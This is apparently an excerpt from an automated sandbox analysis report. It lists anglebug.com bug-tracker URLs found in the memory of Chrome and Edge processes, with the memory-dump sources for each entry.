Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1928927415.000076D800270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4551
Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1924238094.00002F040000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1924973398.000076D80000C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4633
Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4722
Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1928927415.000076D800270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4836
Source: chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4836M
Source: chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4836p
Source: msedge.exe, 0000003B.00000002.1928927415.000076D800270000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4836v
Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4901
Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4937
Source: chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4937v
Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1924973398.000076D80000C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5007
Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5055
Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5061
Source: chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5061(
Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5281
Source: chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5281z
Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5371
Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1924238094.00002F040000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5375
Source: chrome.exe, 0000003A.00000002.1924238094.00002F040000C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5375a
Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5421
Source: chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5421O
Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5430
Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5535
Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5658
Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1924973398.000076D80000C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5750
Source: chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5881
Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1924238094.00002F040000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1924973398.000076D80000C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5901
Source: msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1928927415.000076D800270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5906
Source: chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5906&
Source: chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/59060
Source: chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/59061
Source: chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5906G
Source: chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5906H
Source: msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5906S
Source: msedge.exe, 0000003B.00000002.1928927415.000076D800270000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5906v
Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1928927415.000076D800270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6041
Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6048
Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6141
Source: chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/61415
Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1924238094.00002F040000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6248
Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6439
Source: chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6439s
Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1924238094.00002F040000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1924973398.000076D80000C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6651
Source: msedge.exe, 0000003B.00000002.1924973398.000076D80000C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6651v
Source: chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6692
Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1924973398.000076D80000C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6755
Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1924238094.00002F040000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1924973398.000076D80000C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6860
Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6876
Source: chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6878
Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1924238094.00002F040000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6929
Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1924238094.00002F040000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1924973398.000076D80000C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6953
Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1924238094.00002F040000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1928927415.000076D800270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7036
Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1924238094.00002F040000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1924973398.000076D80000C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7047
Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7172
Source: chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7172h
Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7279
Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1928927415.000076D800270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7370
Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1924238094.00002F040000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1924973398.000076D80000C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7406
Source: chrome.exe, 0000003A.00000002.1924238094.00002F040000C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7406/
Source: chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7488
Source: chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7553
